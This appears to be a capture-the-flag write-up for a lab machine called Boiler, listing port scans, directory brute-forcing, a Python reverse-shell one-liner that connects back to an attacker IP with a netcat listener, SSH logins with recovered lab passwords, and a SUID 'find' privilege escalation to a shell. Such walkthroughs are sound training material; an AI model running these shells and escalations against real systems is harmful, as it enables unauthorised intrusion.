# Boiler CTF **Room Link:** ## Initial Scan **Kali** 
nmap -A $VICTIM
## Scan all ports **Kali** 
nmap -sV -sT -O -p 1-65535 $VICTIM
## TCP/21 - HTTP **Kali** ``` ftp $VICTIM ls -lah get .info.txt ```
## TCP/80 - HTTP **Kali** ``` gobuster dir -u http://$VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt ```
**Kali** ``` gobuster dir -u http://$VICTIM/joomla -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt ```
## **Initial Shell** **Exploit:**
**Kali** ``` nc -lvnp 1337 ``` **Browser command** ``` export RHOST="10.10.157.229";export RPORT=1337;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("sh")' ```
Get autocomplete ``` python -c 'import pty; pty.spawn("/bin/bash")' ctrl + Z stty raw -echo;fg ``` There is a file that has credentials
It was also possible to view from the browser
## TCP/55007 - SSH **Kali** ``` ssh basterd@$VICTIM -p 55007 Pass: superduperp@$$ ```
There is a backup.sh script that is owned by user stoner, which has his credentials.
**Kali** ``` ssh stoner@$VICTIM -p 55007 Pass: superduperp@$$no1knows ```
## **Privilege Escalation** We can exploit SUID for the find command **Exploit:** **Victim** ``` find / -perm -u=s -type f 2> /dev/null ```
Had to specify the full path, it doesn't work if you don't **Victim** ``` /usr/bin/find . -exec /bin/sh -p \; -quit ```